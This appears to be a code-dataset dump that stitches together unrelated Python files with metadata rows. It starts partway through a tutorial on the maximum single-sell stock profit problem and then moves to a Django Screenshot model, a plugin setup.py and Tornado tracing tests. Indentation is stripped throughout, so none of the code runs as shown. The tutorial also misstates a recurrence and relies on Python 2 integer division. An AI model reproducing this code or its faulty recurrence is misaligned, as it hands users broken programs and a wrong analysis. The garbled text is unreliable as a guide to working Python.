# answers that you can arrive at by thinking about the problem in slightly
# different ways.
#
# The maximum single-sell profit problem is defined as follows. You are given
# an array of stock prices representing the value of some stock over time.
# Assuming that you are allowed to buy the stock exactly once and sell the
# stock exactly once, what is the maximum profit you can make? For example,
# given the prices
#
# 2, 7, 1, 8, 2, 8, 4, 5, 9, 0, 4, 5
#
# The maximum profit you can make is 8, by buying when the stock price is 1 and
# selling when the stock price is 9. Note that while the greatest difference
# in the array is 9 (by subtracting 9 - 0), we cannot actually make a profit of
# 9 here because the stock price of 0 comes after the stock price of 9 (though
# if we wanted to lose a lot of money, buying high and selling low would be a
# great idea!)
#
# In the event that there's no profit to be made at all, we can always buy and
# sell on the same date. For example, given these prices (which might
# represent a buggy-whip manufacturer:)
#
# 9, 8, 7, 6, 5, 4, 3, 2, 1, 0
#
# The best profit we can make is 0 by buying and selling on the same day.
#
# Let's begin by writing the simplest and easiest algorithm we know of that
# can solve this problem - brute force. We will just consider all O(n^2) pairs
# of values, and then pick the one with the highest net profit. There are
# exactly n + (n - 1) + (n - 2) + ... + 1 = n(n + 1)/2 different pairs to pick
# from, so this algorithm will grow quadratically in the worst-case. However,
# it uses only O(1) memory, which is a somewhat attractive feature. Plus, if
# our first intuition for the problem gives a quadratic solution, we can be
# satisfied that if we don't come up with anything else, we can always have a
# polynomial-time solution.
def BruteForceSingleSellProfit(arr):
# Store the best possible profit we can make; initially this is 0.
bestProfit = 0;
# Iterate across all pairs and find the best out of all of them. As a
# minor optimization, we don't consider any pair consisting of a single
# element twice, since we already know that we get profit 0 from this.
for i in range(0, len(arr)):
for j in range (i + 1, len(arr)):
bestProfit = max(bestProfit, arr[j] - arr[i])
return bestProfit
# This solution is extremely inelegant, and it seems like there just *has* to
# be a better solution. In fact, there are many better solutions, and we'll
# see three of them.
#
# The first insight comes if we try to solve this problem by using a divide-
# and-conquer strategy. Let's consider what happens if we split the array into
# two (roughly equal) halves. If we do so, then there are three possible
# options about where the best buy and sell times are:
#
# 1. We should buy and sell purely in the left half of the array.
# 2. We should buy and sell purely in the right half of the array.
# 3. We should buy in the left half of the array and sell in the right half of
# the array.
#
# (Note that we don't need to consider selling in the left half of the array
# and buying in the right half of the array, since the buy time must always
# come before the sell time)
#
# If we want to solve this problem recursively, then we can get values for (1)
# and (2) by recursively invoking the algorithm on the left and right
# subarrays. But what about (3)? Well, if we want to maximize our profit, we
# should be buying at the lowest possible cost in the left half of the array
# and selling at the highest possible cost in the right half of the array.
# This gives a very elegant algorithm for solving this problem:
#
# If the array has size 0 or size 1, the maximum profit is 0.
# Otherwise:
# Split the array in half.
# Compute the maximum single-sell profit in the left array, call it L.
# Compute the maximum single-sell profit in the right array, call it R.
# Find the minimum of the first half of the array, call it Min
# Find the maximum of the second half of the array, call it Max
# Return the maximum of L, R, and Max - Min.
#
# Let's consider the time and space complexity of this algorithm. Our base
# case takes O(1) time, and in our recursive step we make two recursive calls,
# one on each half of the array, and then does O(n) work to scan the array
# elements to find the minimum and maximum values. This gives the recurrence
#
# T(1) = O(1)
# T(n / 2) = 2T(n / 2) + O(n)
#
# Using the Master Theorem, this recurrence solves to O(n log n), which is
# asymptotically faster than our original approach! However, we do pay a
# (slight) cost in memory usage. Because we need to maintain space for all of
# the stack frames we use. Since on each recursive call we cut the array size
# in half, the maximum number of recursive calls we can make is O(log n), so
# this algorithm uses O(n log n) time and O(log n) memory.
def DivideAndConquerSingleSellProfit(arr):
# Base case: If the array has zero or one elements in it, the maximum
# profit is 0.
if len(arr) <= 1:
return 0;
# Cut the array into two roughly equal pieces.
left = arr[ : len(arr) / 2]
right = arr[len(arr) / 2 : ]
# Find the values for buying and selling purely in the left or purely in
# the right.
leftBest = DivideAndConquerSingleSellProfit(left)
rightBest = DivideAndConquerSingleSellProfit(right)
# Compute the best profit for buying in the left and selling in the right.
crossBest = max(right) - min(left)
# Return the best of the three
return max(leftBest, rightBest, crossBest)
# While the above algorithm for computing the maximum single-sell profit is
# better timewise than what we started with (O(n log n) versus O(n^2)), we can
# still improve the time performance. In particular, recall our recurrence
# relation:
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(n)
#
# Here, the O(n) term in the T(n) case comes from the work being done to find
# the maximum and minimum values in the right and left halves of the array,
# respectively. If we could find these values faster than what we're doing
# right now, we could potentially decrease the function's runtime.
#
# The key observation here is that we can compute the minimum and maximum
# values of an array using a divide-and-conquer approach. Specifically:
#
# If the array has just one element, it is the minimum and maximum value.
# Otherwise:
# Split the array in half.
# Find the minimum and maximum values from the left and right halves.
# Return the minimum and maximum of these two values.
#
# Notice that our base case does only O(1) work, and our recursive case manages
# to do only O(1) work in addition to the recursive calls. This gives us the
# recurrence relation
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(1)
#
# Using the Master Theorem, this solves to O(n).
#
# How can we make use of this result? Well, in our current divide-and-conquer
# solution, we split the array in half anyway to find the maximum profit we
# could make in the left and right subarrays. Could we have those recursive
# calls also hand back the maximum and minimum values of the respective arrays?
# If so, we could rewrite our solution as follows:
#
# If the array has size 1, the maximum profit is zero and the maximum and
# minimum values are the single array element.
# Otherwise:
# Split the array in half.
# Compute the maximum single-sell profit in the left array, call it L.
# Compute the maximum single-sell profit in the right array, call it R.
# Let Min be the minimum value in the left array, which we got from our
# first recursive call.
# Let Max be the maximum value in the right array, which we got from our
# second recursive call.
# Return the maximum of L, R, and Max - Min for the maximum single-sell
# profit, and the appropriate maximum and minimum values found from
# the recursive calls.
#
# The correctness proof for this algorithm works just as it did before, but now
# we never actually do a scan of the array at each step. In fact, we do only
# O(1) work at each level. This gives a new recurrence
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(1)
#
# Which solves to O(n). We're now using O(n) time and O(log n) memory, which
# is asymptotically faster than before!
#
# The code for this is given below:
def OptimizedDivideAndConquerSingleSellProfit(arr):
# If the array is empty, the maximum profit is zero.
if len(arr) == 0:
return 0
# This recursive helper function implements the above recurrence. It
# returns a triple of (max profit, min array value, max array value). For
# efficiency reasons, we always reuse the array and specify the bounds as
# [lhs, rhs]
def Recursion(arr, lhs, rhs):
# If the array has just one element, we return that the profit is zero
# but the minimum and maximum values are just that array value.
if lhs == rhs:
return (0, arr[lhs], arr[rhs])
# Recursively compute the values for the first and latter half of the
# array. To do this, we need to split the array in half. The line
# below accomplishes this in a way that, if ported to other languages,
# cannot result in an integer overflow.
mid = lhs + (rhs - lhs) / 2
# Perform the recursion.
( leftProfit, leftMin, leftMax) = Recursion(arr, lhs, mid)
(rightProfit, rightMin, rightMax) = Recursion(arr, mid + 1, rhs)
# Our result is the maximum possible profit, the minimum of the two
# minima we've found (since the minimum of these two values gives the
# minimum of the overall array), and the maximum of the two maxima.
maxProfit = max(leftProfit, rightProfit, rightMax - leftMin)
return (maxProfit, min(leftMin, rightMin), max(leftMax, rightMax))
# Using our recursive helper function, compute the resulting value.
profit, _, _ = Recursion(arr, 0, len(arr) - 1)
return profit
# At this point we've traded our O(n^2)-time, O(1)-space solution for an O(n)-
# time, O(log n) space solution. But can we do better than this?
#
# To find a better algorithm, we'll need to switch our line of reasoning.
# Rather than using divide-and-conquer, let's see what happens if we use
# dynamic programming. In particular, let's think about the following problem.
# If we knew the maximum single-sell profit that we could get in just the first
# k array elements, could we use this information to determine what the
# maximum single-sell profit would be in the first k + 1 array elements? If we
# could do this, we could use the following algorithm:
#
# Find the maximum single-sell profit to be made in the first 1 elements.
# For i = 2 to n:
# Compute the maximum single-sell profit using the first i elements.
#
# How might we do this? One intuition is as follows. Suppose that we know the
# maximum single-sell profit of the first k elements. If we look at k + 1
# elements, then either the maximum profit we could make by buying and selling
# within the first k elements (in which case nothing changes), or we're
# supposed to sell at the (k + 1)st price. If we wanted to sell at this price
# for a maximum profit, then we would want to do so by buying at the lowest of
# the first k + 1 prices, then selling at the (k + 1)st price.
#
# To accomplish this, suppose that we keep track of the minimum value in the
# first k elements, along with the maximum profit we could make in the first
# k elements. Upon seeing the (k + 1)st element, we update what the current
# minimum value is, then update what the maximum profit we can make is by
# seeing whether the difference between the (k + 1)st element and the new
# minimum value is. Note that it doesn't matter what order we do this in; if
# the (k + 1)st element is the smallest element so far, there's no possible way
# that we could increase our profit by selling at that point.
#
# To finish up this algorithm, we should note that given just the first price,
# the maximum possible profit is 0.
#
# This gives the following simple and elegant algorithm for the maximum single-
# sell profit problem:
#
# Let profit = 0.
# Let min = arr[0]
# For k = 1 to length(arr):
# If arr[k] < min, set min = arr[k]
# If profit < arr[k] - min, set profit = arr[k] - min
#
# This is short, sweet, and uses only O(n) time and O(1) memory. The beauty of
# this solution is that we are quite naturally led there by thinking about how
# to update our answer to the problem in response to seeing some new element.
# In fact, we could consider implementing this algorithm as a streaming
# algorithm, where at each point in time we maintain the maximum possible
# profit and then update our answer every time new data becomes available.
#
# The final version of this algorithm is shown here:
def DynamicProgrammingSingleSellProfit(arr):
# If the array is empty, we cannot make a profit.
if len(arr) == 0:
return 0
# Otherwise, keep track of the best possible profit and the lowest value
# seen so far.
profit = 0
cheapest = arr[0]
# Iterate across the array, updating our answer as we go according to the
# above pseudocode.
for i in range(1, len(arr)):
# Update the minimum value to be the lower of the existing minimum and
# the new minimum.
cheapest = min(cheapest, arr[i])
# Update the maximum profit to be the larger of the old profit and the
# profit made by buying at the lowest value and selling at the current
# price.
profit = max(profit, arr[i] - cheapest)
return profit
# To summarize our algorithms, we have seen
#
# Naive: O(n ^ 2) time, O(1) space
# Divide-and-conquer: O(n log n) time, O(log n) space
# Optimized divide-and-conquer: O(n) time, O(log n) space
# Dynamic programming: O(n) time, O(1) space
| 46.740506 | 79 | 0.697427 |
ba35333c6fd444774accc2f12496509eebe77f7c | 4,150 | py | Python | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | 1 | 2015-01-16T04:17:54.000Z | 2015-01-16T04:17:54.000Z | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | null | null | null | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | null | null | null | # Copyright (c) 2010, individual contributors (see AUTHORS file)
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import Image
import os
from django.db import models
from settings import SCREENSHOT_URL, SCREENSHOT_PATH
from Project import Project
SCREENSHOT_WIDTH = 230.0
SCREENSHOT_HEIGHT = 170.0
MAIN_PAGE_WIDTH = 605.0
MAIN_PAGE_HEIGHT = 300.0
# a screenshot for a project, display on its page. its filename is derived from
# its ID, so it is not required as a field
class Screenshot(models.Model):
class Meta:
app_label = 'dashboard'
# the title of the screenshot
title = models.CharField(max_length = 32)
# a short description of the screenshot
description = models.CharField(max_length = 100)
# what project is this a screenshot of?
project = models.ForeignKey(Project)
# file extension
extension = models.CharField(max_length = 8)
# save override to validate title/description length
def save(self, *args, **kwargs):
self.title = self.title[0:32]
self.description = self.description[0:100]
super(Screenshot, self).save(*args, **kwargs)
# the filename for this file. just the last part, no directory specified.
def filename(self):
return "{0}{1}".format(str(self.id), self.extension)
# the thumbnail filename for this file, no directory specified.
def thumbnail(self):
return str(self.id) + "_t.png"
# the url of a screenshot
def url(self):
return os.path.join(SCREENSHOT_URL, self.filename())
# the thumbnail url of a screenshot
def thumb_url(self):
return os.path.join(SCREENSHOT_URL, self.thumbnail())
# the large thumbnail to be used on the main page
def main_page_url(self):
return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png")
# a static creation method to handle writing to disk
@staticmethod
def create(form, file, project):
# create a screenshot object in the database
screen = Screenshot(title = form.cleaned_data["title"],
description = form.cleaned_data["description"],
project = project,
extension = os.path.splitext(file.name)[1])
screen.save()
# write the screenshot to a file
path = os.path.join(SCREENSHOT_PATH, screen.filename())
write = open(path, 'wb+')
# write the chunks
for chunk in file.chunks():
write.write(chunk)
write.close()
def create_thumbnail(path, save, width, height):
# create a thumbnail of the file
img = Image.open(path)
# resize the image for a thumbnail
scalex = width / img.size[0]
scaley = height / img.size[1]
scale = scalex if scalex > scaley else scaley
img = img.resize((int(img.size[0] * scale),
int(img.size[1] * scale)),
Image.ANTIALIAS)
# crop the image to fit
if img.size[0] > width or img.size[1] > height:
left = (img.size[0] - width) / 2
right = left + width
top = (img.size[1] - height) / 2
bottom = top + height
img = img.crop((int(left), int(top), int(right), int(bottom)))
# save the thumbnail
save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id)))
img.save(save_path, "PNG")
create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT)
create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT)
return screen
| 34.87395 | 79 | 0.675181 |
eb206cad622a448b6d3bfb4109bb2d6233f04bcb | 535 | py | Python | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
from setuptools import setup, find_packages
setup(name='att_cybersecurity_alienvault_otx-rapid7-plugin',
version='1.0.1',
description='Open Threat Exchange is the neighborhood watch of the global intelligence community',
author='rapid7',
author_email='',
url='',
packages=find_packages(),
install_requires=['komand'], # Add third-party dependencies to requirements.txt, not here!
scripts=['bin/komand_att_cybersecurity_alienvault_otx']
)
| 35.666667 | 104 | 0.71215 |
b359d5f9c3478c40ddf979b07267dd5b8c989a2a | 23,912 | py | Python | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 308 | 2016-12-07T16:49:27.000Z | 2022-03-15T10:06:45.000Z | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 1,928 | 2016-11-28T17:13:18.000Z | 2022-03-31T21:43:19.000Z | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 311 | 2016-11-27T03:01:49.000Z | 2022-03-18T21:34:03.000Z | import pytest
import tornado
from ddtrace import config
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.ext import http
from tests.opentracer.utils import init_tracer
from tests.utils import assert_is_measured
from tests.utils import assert_span_http_status_code
from .utils import TornadoTestCase
from .utils import TracerTestCase
from .web.app import CustomDefaultHandler
class TestTornadoWeb(TornadoTestCase):
"""
Ensure that Tornado web handlers are properly traced.
"""
def test_success_handler(self, query_string=""):
# it should trace a handler that returns 200
if query_string:
fqs = "?" + query_string
else:
fqs = ""
response = self.fetch("/success/" + fqs)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SuccessHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
if config.tornado.trace_query_string:
assert query_string == request_span.get_tag(http.QUERY_STRING)
else:
assert http.QUERY_STRING not in request_span.meta
assert 0 == request_span.error
def test_success_handler_query_string(self):
self.test_success_handler("foo=bar")
def test_success_handler_query_string_trace(self):
with self.override_http_config("tornado", dict(trace_query_string=True)):
self.test_success_handler("foo=bar")
def test_status_code_500_handler(self):
"""
Test an endpoint which sets the status code to 500 but doesn't raise an exception
We expect the resulting span to be marked as an error
"""
response = self.fetch("/status_code/500")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tests.contrib.tornado.web.app.ResponseStatusHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/status_code/500") == request_span.get_tag(http.URL)
assert 1 == request_span.error
def test_nested_handler(self):
# it should trace a handler that calls the tracer.trace() method
# using the automatic Context retrieval
response = self.fetch("/nested/")
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
# check request span
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.NestedHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/nested/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check nested span
nested_span = traces[0][1]
assert "tornado-web" == nested_span.service
assert "tornado.sleep" == nested_span.name
assert 0 == nested_span.error
# check durations because of the yield sleep
assert request_span.duration >= 0.05
assert nested_span.duration >= 0.05
def test_exception_handler(self):
# it should trace a handler that raises an exception
response = self.fetch("/exception/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.ExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "Ouch!" == request_span.get_tag("error.msg")
assert "Exception: Ouch!" in request_span.get_tag("error.stack")
def test_http_exception_handler(self):
# it should trace a handler that raises a Tornado HTTPError
response = self.fetch("/http_exception/")
assert 501 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.HTTPExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 501)
assert self.get_url("/http_exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "HTTP 501: Not Implemented (unavailable)" == request_span.get_tag("error.msg")
assert "HTTP 501: Not Implemented (unavailable)" in request_span.get_tag("error.stack")
def test_http_exception_500_handler(self):
# it should trace a handler that raises a Tornado HTTPError
response = self.fetch("/http_exception_500/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.HTTPException500Handler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/http_exception_500/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "HTTP 500: Server Error (server error)" == request_span.get_tag("error.msg")
assert "HTTP 500: Server Error (server error)" in request_span.get_tag("error.stack")
def test_sync_success_handler(self):
# it should trace a synchronous handler that returns 200
response = self.fetch("/sync_success/")
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SyncSuccessHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/sync_success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_sync_exception_handler(self):
# it should trace a handler that raises an exception
response = self.fetch("/sync_exception/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SyncExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/sync_exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "Ouch!" == request_span.get_tag("error.msg")
assert "Exception: Ouch!" in request_span.get_tag("error.stack")
def test_404_handler(self):
# it should trace 404
response = self.fetch("/does_not_exist/")
assert 404 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tornado.web.ErrorHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 404)
assert self.get_url("/does_not_exist/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_redirect_handler(self):
# it should trace the built-in RedirectHandler
response = self.fetch("/redirect/")
assert 200 == response.code
# we trace two different calls: the RedirectHandler and the SuccessHandler
traces = self.pop_traces()
assert 2 == len(traces)
assert 1 == len(traces[0])
assert 1 == len(traces[1])
redirect_span = traces[0][0]
assert_is_measured(redirect_span)
assert "tornado-web" == redirect_span.service
assert "tornado.request" == redirect_span.name
assert "web" == redirect_span.span_type
assert "tornado.web.RedirectHandler" == redirect_span.resource
assert "GET" == redirect_span.get_tag("http.method")
assert_span_http_status_code(redirect_span, 301)
assert self.get_url("/redirect/") == redirect_span.get_tag(http.URL)
assert 0 == redirect_span.error
success_span = traces[1][0]
assert "tornado-web" == success_span.service
assert "tornado.request" == success_span.name
assert "web" == success_span.span_type
assert "tests.contrib.tornado.web.app.SuccessHandler" == success_span.resource
assert "GET" == success_span.get_tag("http.method")
assert_span_http_status_code(success_span, 200)
assert self.get_url("/success/") == success_span.get_tag(http.URL)
assert 0 == success_span.error
def test_static_handler(self):
# it should trace the access to static files
response = self.fetch("/statics/empty.txt")
assert 200 == response.code
assert "Static file\n" == response.body.decode("utf-8")
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tornado.web.StaticFileHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/statics/empty.txt") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_propagation(self):
# it should trace a handler that returns 200 with a propagated context
headers = {"x-datadog-trace-id": "1234", "x-datadog-parent-id": "4567", "x-datadog-sampling-priority": "2"}
response = self.fetch("/success/", headers=headers)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
# simple sanity check on the span
assert "tornado.request" == request_span.name
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check propagation
assert 1234 == request_span.trace_id
assert 4567 == request_span.parent_id
assert 2 == request_span.get_metric(SAMPLING_PRIORITY_KEY)
# Opentracing support depends on new AsyncioScopeManager
# See: https://github.com/opentracing/opentracing-python/pull/118
@pytest.mark.skipif(
tornado.version_info >= (5, 0), reason="Opentracing ScopeManager not available for Tornado >= 5"
)
def test_success_handler_ot(self):
"""OpenTracing version of test_success_handler."""
from opentracing.scope_managers.tornado import TornadoScopeManager
ot_tracer = init_tracer("tornado_svc", self.tracer, scope_manager=TornadoScopeManager())
with ot_tracer.start_active_span("tornado_op"):
response = self.fetch("/success/")
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
# dd_span will start and stop before the ot_span finishes
ot_span, dd_span = traces[0]
# confirm the parenting
assert ot_span.parent_id is None
assert dd_span.parent_id == ot_span.span_id
assert ot_span.name == "tornado_op"
assert ot_span.service == "tornado_svc"
assert_is_measured(dd_span)
assert "tornado-web" == dd_span.service
assert "tornado.request" == dd_span.name
assert "web" == dd_span.span_type
assert "tests.contrib.tornado.web.app.SuccessHandler" == dd_span.resource
assert "GET" == dd_span.get_tag("http.method")
assert_span_http_status_code(dd_span, 200)
assert self.get_url("/success/") == dd_span.get_tag(http.URL)
assert 0 == dd_span.error
class TestTornadoWebAnalyticsDefault(TornadoTestCase):
"""
Ensure that Tornado web handlers generate APM events with default settings
"""
def test_analytics_global_on_integration_default(self):
"""
When making a request
When an integration trace search is not event sample rate is not set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
with self.override_global_config(dict(analytics_enabled=True)):
# it should trace a handler that returns 200
response = self.fetch("/success/")
self.assertEqual(200, response.code)
self.assert_structure(
dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 1.0}),
)
def test_analytics_global_off_integration_default(self):
"""
When making a request
When an integration trace search is not set and sample rate is set and globally trace search is disabled
We expect the root span to not include tag
"""
with self.override_global_config(dict(analytics_enabled=False)):
# it should trace a handler that returns 200
response = self.fetch("/success/")
self.assertEqual(200, response.code)
root = self.get_root_span()
self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
class TestTornadoWebAnalyticsOn(TornadoTestCase):
"""
Ensure that Tornado web handlers generate APM events with default settings
"""
def get_settings(self):
# distributed_tracing needs to be disabled manually
return {
"datadog_trace": {
"analytics_enabled": True,
"analytics_sample_rate": 0.5,
},
}
def test_analytics_global_on_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
with self.override_global_config(dict(analytics_enabled=True)):
# it should trace a handler that returns 200
response = self.fetch("/success/")
self.assertEqual(200, response.code)
self.assert_structure(
dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 0.5}),
)
def test_analytics_global_off_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is disabled
We expect the root span to have the appropriate tag
"""
with self.override_global_config(dict(analytics_enabled=False)):
# it should trace a handler that returns 200
response = self.fetch("/success/")
self.assertEqual(200, response.code)
self.assert_structure(
dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 0.5}),
)
class TestTornadoWebAnalyticsNoRate(TornadoTestCase):
"""
Ensure that Tornado web handlers generate APM events with default settings
"""
def get_settings(self):
# distributed_tracing needs to be disabled manually
return {
"datadog_trace": {
"analytics_enabled": True,
},
}
def test_analytics_global_on_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
with self.override_global_config(dict(analytics_enabled=True)):
# it should trace a handler that returns 200
response = self.fetch("/success/")
self.assertEqual(200, response.code)
self.assert_structure(
dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 1.0}),
)
class TestNoPropagationTornadoWebViaSetting(TornadoTestCase):
"""
Ensure that Tornado web handlers are properly traced and are ignoring propagated HTTP headers when disabled.
"""
def get_settings(self):
# distributed_tracing needs to be disabled manually
return {
"datadog_trace": {
"distributed_tracing": False,
},
}
def test_no_propagation(self):
# it should not propagate the HTTP context
headers = {
"x-datadog-trace-id": "1234",
"x-datadog-parent-id": "4567",
"x-datadog-sampling-priority": "2",
"x-datadog-origin": "synthetics",
}
response = self.fetch("/success/", headers=headers)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
# simple sanity check on the span
assert "tornado.request" == request_span.name
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check non-propagation
assert request_span.trace_id != 1234
assert request_span.parent_id != 4567
assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
class TestNoPropagationTornadoWebViaConfig(TornadoTestCase):
"""
Ensure that Tornado web handlers are properly traced and are ignoring propagated HTTP headers when disabled.
"""
def test_no_propagation_via_int_config(self):
config.tornado.distributed_tracing = False
# it should not propagate the HTTP context
headers = {
"x-datadog-trace-id": "1234",
"x-datadog-parent-id": "4567",
"x-datadog-sampling-priority": "2",
"x-datadog-origin": "synthetics",
}
response = self.fetch("/success/", headers=headers)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
# simple sanity check on the span
assert "tornado.request" == request_span.name
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
